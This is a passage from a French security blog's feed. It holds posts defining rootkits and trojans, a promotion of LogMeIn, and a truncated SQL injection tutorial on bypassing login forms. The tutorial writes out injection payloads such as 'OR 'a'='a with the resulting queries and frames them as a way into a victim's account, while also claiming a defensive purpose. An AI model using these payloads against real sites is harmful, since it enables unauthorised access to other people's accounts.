href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7128387501389646730'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/05/type-de-carte-selectionnez.html' title='Arnaque MSN'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_myG8IURVG2Y/ShwnCCPmISI/AAAAAAAAADM/om_y3TtSuYc/s72-c/kyle-trombone_rouge-2%5B1%5D.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4647264687035816854</id><published>2008-11-22T04:48:00.000-08:00</published><updated>2009-03-06T07:33:12.559-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkit'/><title type='text'>Rootkit</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:180%;color:#cc0000;"&gt;Rootkit&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Mot emprunté au monde Unix / Linux dans lequel il désigne un parasite permettant de s'octroyer des droits "Root", c'est-à-dire :&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;&lt;em&gt;-les niveaux de droits les plus élevés de l'administrateur de la machine&lt;br /&gt;-afin de prendre le contrôle de cette dernière&lt;br /&gt;-tout en restant furtif (invisible).&lt;/em&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#990000;"&gt;A partir de là, sous Unix/Linux, il est possible de faire ce que l'on veut sur cette machine dont implanter des processus parasites.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Il n'est pas aisé de violer les systèmes Unix / Linux et un Rootkit est nécessaire pour le faire.&lt;br /&gt;&lt;br /&gt;Les Rootkits remontent à une période antérieure à 1997 puisqu'à cette époque démarre un projet open source (à code public) nommé "ChkRootKit" ("Chek RootKit") destiné à detecter les RootKits dans le monde Linux.&lt;br /&gt;&lt;br /&gt;Dans le monde Windows, le viol du système est aisé et un Rootkit au sens de ceux du monde Unix n'est pas nécessaire pour prendre le contrôle des PC et les zombifier, d'autant que la très grande majorité des utilisateurs Windows, malgré les avertissements des sites de sécurité, travaille directement en mode administrateur.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Les Rootkits Windows sont restés, un temps, un travail purement intellectuel et spéculatif des laboratoires de recherches en virologie et des gentils hackers ("Whitehats"). Ils n'avaient aucune charge active ni n'étaient sortis des laboratoires.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aujourd'hui, un Rootkit, dans le monde Windows (les versions de Windows à base de noyau NT sont concernées - NT, XP, 2000), désigne plutôt une boîte à outils (nous devrions plutôt parler de Tools Kit) insérée par un hacker du monde obscur du Net (les "Blackhats") et qui va l'aider à :&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;&lt;em&gt;essentiellement cacher des parasites avec des Hooker. La grande activité des RootKits est de rendre un parasite totalement furtif (dont le rootkit lui-même) en interceptant toutes les formes de requêtes faites au système (aux APIs système et programmes de dignostique) par quelque application que ce soit et de perdre la réponse ou de la crétiniser afin qu'un antivirus ou un anti-trojans ou toute autre outil ou recherche n'aboutise jamais (impossibilité de tuer un processus, prétendre qu'un fichier a été détruit ou n'existe pas alors qu'il est bien là, masquer ou modifier le contenu d'un paquet etc. ...) et ne dévoile jamais la présence d'un parasite protégé par le RootKit&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#3333ff;"&gt;compromettre une machine déjà faible (failles non corrigées...) par la mise en place de plusieurs backdoors et autres outils lui "facilitant la vie" par la suite pour, en un second temps, déployer d'autres parasites, implanter de quoi utiliser la machine et en faire un zombie et pouvoir y revenir quand il veut sans avoir à utiliser une faille peut-être corrigée depuis...&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Les RootKits sont devenus le problème numéro 1 des malveillances en 2006. Les détecter semble être une barrière à franchir en matière de recherches logiciel. Quant-à les éradiquer, eux et ce qu'ils cachent, c'est d'un tout autre niveau de difficultés - éradiquer un RootKit et restaurer un système stable n'est pas atteint dans 100% des cas. Quelques rootkits capables de pénétrer les BIOS (basic input/output system) les rendent sensibles au point de « planter » l’ordinateur si vous vous êtes débarrassés du rootkit.&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4647264687035816854?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4647264687035816854/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/rootkit.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4647264687035816854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4647264687035816854'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/rootkit.html' title='Rootkit'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-1652887382362356075</id><published>2008-11-22T04:14:00.000-08:00</published><updated>2009-03-06T08:22:17.452-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cheval de Troie? Trojan?'/><title type='text'>Cheval de Troie Trojan</title><content type='html'>&lt;strong&gt;&lt;span style="color:#3366ff;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:#cc0000;"&gt;Qu'est-ce que c'est ?&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Les chevaux de Troie ("Trojan horses" ou "&lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt;&lt;/span&gt;" en anglais) tirent leur nom de la célèbre légende mythologique. Comme dans cette dernière, ils utilisent une ruse pour agir de façon invisible, le plus souvent en se greffant sur un programme anodin.&lt;br /&gt;&lt;br /&gt;Ils font partie des grandes menaces que l'on peut rencontrer sur le web, parmi les &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/definition-virus.html" target="_blank"&gt;&lt;strong&gt;virus&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; et autres &lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/vers.html" target="_blank"&gt;vers&lt;/a&gt; &lt;/span&gt;. Pourtant, contrairement à ceux-ci, les chevaux de Troie ne se reproduisent pas (en tout cas, ce n'est pas leur objectif premier). Ce sont à la base de simples programmes destinés à être executés à l'insu de l'utilisateur.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;&lt;span style="font-size:180%;"&gt;Objectifs&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Leur objectif est le plus souvent d'ouvrir une porte dérobée ("&lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html" target="_blank"&gt;backdoor&lt;/a&gt;&lt;/span&gt;") sur le système cible, permettant par la suite à l'attaquant de revenir à loisir épier, collecter des données, les corrompre, contrôler voire même détruire le système. Certains chevaux de Troie sont d'ailleurs tellement évolués qu'ils sont devenus de véritables outils de prise en main et d'administration à distance.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-size:180%;color:#cc0000;"&gt;Mode d'action&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Leur mode opératoire est souvent le même, ils doivent tout d'abord être introduits dans le système cible le plus discrètement possible. Les moyens sont &lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/methodes-de-diffusion-d-parasite.html" target="_blank"&gt;variés&lt;/a&gt;&lt;/span&gt; et exploitent le vaste éventail des failles de sécurité, du simple économiseur d'écran piégé (envoyé par mail ou autre, du &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/fichiers-risque.html" target="_blank"&gt;&lt;strong&gt;type&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; cadeau.exe, snow.exe, etc, etc...) jusqu'à l'exploitation plus complexe d'un buffer overflow.&lt;br /&gt;Après leur introduction dans le système, ils se cachent dans des répertoires système ou se lient à des exécutables. Ils modifient le système d'exploitation cible (sous Windows, la base des registres) pour pouvoir démarrer en même temps que la machine. De plus, ils sont actifs en permanence (car un cheval de Troie est un véritable serveur, il reste à l'écoute des connections provenant de l'attaquant pour recevoir des instructions) mais ils restent furtifs et sont rarement détectables par l'utilisateur. Ainsi, un listing des tâches courantes ne fournira pas d'indication suffisante : soit le cheval de Troie y sera invisible, soit son nom sera tout ce qu'il y a de plus banal ("Patch.exe", ".exe", "winamp34.exe", "winrar.exe", "setup.exe", "rundlls").&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-1652887382362356075?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/1652887382362356075/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/1652887382362356075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/1652887382362356075'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html' title='Cheval de Troie Trojan'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-8401025118378058198</id><published>2008-11-21T06:42:00.000-08:00</published><updated>2009-03-06T07:36:41.457-08:00</updated><title type='text'>Contrôle à distance</title><content type='html'>&lt;div align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;img id="BLOGGER_PHOTO_ID_5271122361651031954" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 105px; CURSOR: hand; HEIGHT: 36px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSbJ3D3T75I/AAAAAAAABD4/Yxa3lQHYhYc/s400/logolmi%5B1%5D.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;LogMeIn Free est un software gratuit permettant de prendre le contrôle à distance d'un PC, il peut être très utile pour aider votre famille, amis ou vos proches à naviguer à distance dans leur PC, à leur monter où trouver tel ou tel fichier, comment installer un logiciel, etc...Mais aussi pour vous, il vous permet d'accéder à votre PC à partir de n'importe quel navigateur.&lt;br /&gt;J'ai découvert ce software il y a quelques années et j'ai vraiment été séduit par sa simplicité d'utilisation et d'installation, il suffit d'envoyer un mail à vos proches pour prendre le contrôle de leur PC. De plus (si c'est toujours d'actualité) en téléchargent LogMeIn Free vous avez droit à 30 jours d'essai à LogMeIn Pro, ce qui permet de mettre côte à côte votre disque dur et celui de la prise de contôle et de transférer des fichiers par un simple glissement ou copier/coller.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;Voici les fonctions disponibles : &lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5271122439868935778" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 80px; CURSOR: hand; HEIGHT: 43px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_f87oXEJfKnY/SSbJ7nP6bmI/AAAAAAAABEA/ikED3aII9u8/s400/lmi-free-m%5B1%5D.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Fonctionnalités d'accès à distance&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Accès à vos fichiers à partir de n'importe quel navigateur&lt;br /&gt;Accès à vos fichiers à partir d'un assistant personnel sans fil&lt;br /&gt;Contrôle à distance et affichage du bureau&lt;br /&gt;Presse-papiers pour synchronisation avec un ordinateur distant&lt;br /&gt;Messagerie&lt;br /&gt;Redémarrage/reconnexion (mode sans échec inclus)&lt;br /&gt;Accès utilisateurs multiples&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;Sécurité&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;strong&gt;Cryptage de bout en bout en 128 et 256 bits&lt;br /&gt;Détection d'intrusion SSL/TLS&lt;br /&gt;Verrouillage des adresses IP&lt;br /&gt;Accès à plusieurs niveaux basé sur autorisation&lt;br /&gt;Suppression automatique des droits d'accès&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;Connexion&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/strong&gt;&lt;div align="center"&gt;&lt;strong&gt;Aucune configuration de pare-feu, routeur ou proxy requise&lt;br /&gt;Aucun droit d'administrateur requis pour l'ordinateur distant&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5271122502628066066" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 80px; CURSOR: hand; HEIGHT: 43px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSbJ_RC2wxI/AAAAAAAABEI/i4k0Trq22NY/s400/lmi-pro-m%5B1%5D.gif" border="0" /&gt; &lt;p align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Fonctionnalités d'accès à distance&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Accès à vos fichiers à partir de n'importe quel navigateur&lt;br /&gt;Accès à vos fichiers à partir d'un assistant personnel sans fil&lt;br /&gt;Contrôle à distance et affichage du bureau&lt;br /&gt;Déplacement des fichiers par glisser-déposer&lt;br /&gt;Impression locale de documents distants&lt;br /&gt;Son à distance&lt;br /&gt;Transfert de fichiers&lt;br /&gt;Partage&lt;br /&gt;Synchronisation des fichiers&lt;br /&gt;Mini conférence&lt;br /&gt;Mappage des lecteurs&lt;br /&gt;Connexion directe&lt;br /&gt;Presse-papiers pour synchronisation avec un ordinateur distant&lt;br /&gt;Messagerie&lt;br /&gt;Redémarrage/reconnexion (mode sans échec inclus)&lt;br /&gt;Accès utilisateurs multiples&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;Sécurité&lt;/span&gt; &lt;/strong&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;strong&gt;Cryptage de bout en bout en 128 et 256 bits&lt;br /&gt;Détection d'intrusion SSL/TLS&lt;br /&gt;Verrouillage des adresses IP&lt;br /&gt;Accès à plusieurs niveaux basé sur autorisation&lt;br /&gt;Suppression automatique des droits d'accès&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;Connexion&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;strong&gt;Aucune configuration de pare-feu, routeur ou proxy requise&lt;br /&gt;Aucun droit d'administrateur requis pour l'ordinateur distant &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color:#ff0000;"&gt;Le site officiel de LogMeIn&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;a href="https://secure.logmein.com/products/free/default.asp?lang=fr" target="_blank"&gt;&lt;strong&gt;C'est ici&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-8401025118378058198?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/8401025118378058198/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/controle-distance.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8401025118378058198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8401025118378058198'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/controle-distance.html' title='Contrôle à distance'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_f87oXEJfKnY/SSbJ3D3T75I/AAAAAAAABD4/Yxa3lQHYhYc/s72-c/logolmi%5B1%5D.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-63325197222430657</id><published>2008-11-17T12:23:00.000-08:00</published><updated>2009-03-06T07:37:50.686-08:00</updated><title type='text'>Les injections SQL : Trouver un mot de passe</title><content type='html'>&lt;div align="center"&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:#cc0000;"&gt;&lt;em&gt;&lt;strong&gt;Les injections SQL&lt;/strong&gt;&lt;/em&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Les injections SQL peuvent servir à se connecter sur le compte d'une autre personne sans son mot de passe où encore à trouver des mots de passe.Elles sont très utiles pour hacker un site quand on a compris leur fonctionement.Et ils faut également comprendre leur principe si on veut protéger son site de ce genre de failles.Cet article s'adresse à tout le monde, que vous vouliez en apprendre plus sur le hacking ou que vous souhaitiez sécuriser votre site web.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;1 - Description de la faille&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;On peut faire beaucoup d'injections SQL différentes, ici je vous expliquerai comment passer un formulaire de connection alors qu'on n'a pas le mot de passe et comment ensuite trouver ce mot de passe. Pour bypasser le formulaire de connection et se logguer on va injecter des petits morçeaux de codes SQL dont les informations sont forcément vraies (par exemple : 1=1).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Code HTML du formulaire de connection :&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSHpDAdkAAI/AAAAAAAAA6I/b2L59WeAVUA/s1600-h/code+dessin+SQL.bmp"&gt;&lt;img id="BLOGGER_PHOTO_ID_5269749276873064450" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; WIDTH: 334px; CURSOR: hand; HEIGHT: 121px" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSHpDAdkAAI/AAAAAAAAA6I/b2L59WeAVUA/s400/code+dessin+SQL.bmp" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;form&gt;&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;La plupart des sites utilisent un formulaire de connection similaire a celui-ci. Les informations envoyées dans ce formulaire sont ensuite traitées par une page en PHP qui vérifient les informations entrées avec celle présentes dans la base de données.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;2 - Se loguer sans mot de passe avec SELECT&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Les variables que vous avez enteés dans le forumaire vont etre ensuite utilisées dans les requetes SQL. La faille est a ce niveau. Il y a une fonction qui s'apelle &lt;strong&gt;get_magic_quotes_gpc()&lt;/strong&gt; qui rajoute des antislashs ( ) devant les quotes ( ' ) et les doubles quotes ( " ) pour éviter les injections SQL.&lt;br /&gt;Mais cette fonction n'est pas toujours activé par les hébergeurs ce qui engendre une vulnérabilité.&lt;br /&gt;&lt;br /&gt;Dans ce premier exemple les logins et mots de passe sont stockés dans une table users de la base de donnée et nous allons prendre comme login &lt;strong&gt;it's me&lt;/strong&gt; et comme password &lt;strong&gt;ah'ah"ah&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Si get_magic_quotes_gpc() est activée, la requete sera interprétée comme cela :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;it\'s me '&lt;/span&gt; &lt;span style="color:#3333ff;"&gt;AND password&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;='&lt;/span&gt;ah\'ah\"ah&lt;/strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;'&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Si &lt;strong&gt;get_magic_quotes_gpc()&lt;/strong&gt; est désactivée, la requete sera interprétée comme ceci :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;it's me '&lt;/span&gt; &lt;span style="color:#3333ff;"&gt;AND password='&lt;/span&gt;ah'ah"ah&lt;/strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;'&lt;/strong&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Le code SQL selectionne le login ( it's me ) si le login est dans la base de donnée et que le mot de passe entré correspond au mot de passe de la base de donnée.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pour l'instant vous ne voyez pas le danger que provoque la désactivation de &lt;strong&gt;get_magic_quotes_gpc()&lt;/strong&gt;, mais vous allez comprendre.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nous allons maintenant injecter des données vraies dans le code SQL grace au formulaire de connection. Les informations vraies seront par exemple :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- 1=1&lt;br /&gt;- 2=2&lt;br /&gt;- 'a'='a' (je met les quotes car les caractères doivent etre entourés de quotes ' dans les requetes SQL)&lt;br /&gt;- 'z'='z'&lt;br /&gt;- 42&lt;69&gt; 'a'='a' comme information vraie car c'est celle qu'on utilise le plus souvent pour ce genre d'injection mais vous pouvez essayer avec d'autres informations vraies.&lt;br /&gt;On va injecter &lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 'a'='a&lt;/strong&gt;&lt;/span&gt; comme login et comme mot de passe dans le formulaire de connection.&lt;br /&gt;Non, je ne me suis pas trompé avec les quotes, on va bien entrer&lt;span style="color:#ff0000;"&gt;&lt;strong&gt; 'OR 'a'='a&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;Vous pensez peut etre qu'il y a un quote ' en trop au début et un quote ' qui manque a la fin, mais c'est justement cela qui permet de jouer sur la fermeture de la requete.&lt;br /&gt;&lt;br /&gt;Une fois qu'on aura entré &lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 'a'='a&lt;/strong&gt;&lt;/span&gt; en pseudo et en login, la requete SQL sera :&lt;br /&gt;&lt;/p&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;'OR 'a'='a&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;'OR 'a'='a&lt;/span&gt;&lt;/strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;'&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Maintenant vous comprenez mieux pourquoi j'ai mis un quote ' au début et que je n'en ai pas mis a la fin.&lt;br /&gt;En effet, il y a déja un quote ' a la fin de la requete.&lt;br /&gt;J'ai mis des couleurs au code SQL pour que vous compreniez mieux. En bleu la requete SQL de base et en rouge ce qu'on a entré dans le formulaire.&lt;br /&gt;&lt;br /&gt;Pour ceux qui n'aurait pas compris, la partie &lt;strong&gt;OR 'a'='a'&lt;/strong&gt; renverra forcément vrai.&lt;br /&gt;&lt;br /&gt;Quand il n'y a rien entre 2 quotes '', cela veut dire que la chaine de caractère est vide mais cela ne nous sera jamais utile, a part si vous tombez sur un site web qui ne vérifie pas que les champs soient remplies et qu'un mec n'a rien mis en mot de passe. Autant vous dire que les chances sont très minces.&lt;br /&gt;En plus nous n'avons pas besoin de cela pour se connecter a la place d'une autre personne puisque vous pourrez bientot vous connecter sans le mot de passe de votre victime.&lt;br /&gt;&lt;br /&gt;La requete ci-dessus selectionne le pseudo ( &lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 'a'='a&lt;/strong&gt;&lt;/span&gt; ) si il n'y a pas de mot de passe ou si &lt;strong&gt;'a'='a'&lt;/strong&gt; .&lt;br /&gt;Comme&lt;strong&gt; 'a'&lt;/strong&gt; est toujours égale à &lt;strong&gt;'a' &lt;/strong&gt;le pseudo sera a chaque fois selectionné et vous serez connecté au site.&lt;br /&gt;&lt;br /&gt;Alors vous etes content, vous venez de reussir a vous connecter sur un site en bypassant le mot de passe.&lt;br /&gt;&lt;br /&gt;On va essayer de faire une injection avec une autre donnée vraie pour etre sur que vous avez compris.&lt;br /&gt;On va essayer d'injecter &lt;strong&gt;1=1&lt;/strong&gt;, normalement c'est plus facile car on n'a moins de problémes avec les quotes ' mais on devra tout de même injecter une information de type caractére entourée par des quotes pour le mot de passe.&lt;br /&gt;&lt;br /&gt;Par exemple, si on entre &lt;strong&gt;'OR 1=1&lt;/strong&gt; en pseudo et en mot de passe.&lt;br /&gt;La requete SQL sera :&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;'OR 1=1&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;'OR 1=1&lt;/strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;'&lt;br /&gt;&lt;/p&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Mais cette requete SQL ne marchera pas car, si vous regardez les quotes vous vous rendez compte que certains quotes ne sont pas fermés au bon endroit.&lt;br /&gt;Le quote a la fin de &lt;strong&gt;&lt;span style="color:#3333ff;"&gt;login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;'OR 1=1&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;'&lt;/span&gt;&lt;/strong&gt; est invalide car il ouvre un quote qui est mal placé.&lt;br /&gt;Maintenant vous comprenez pourquoi 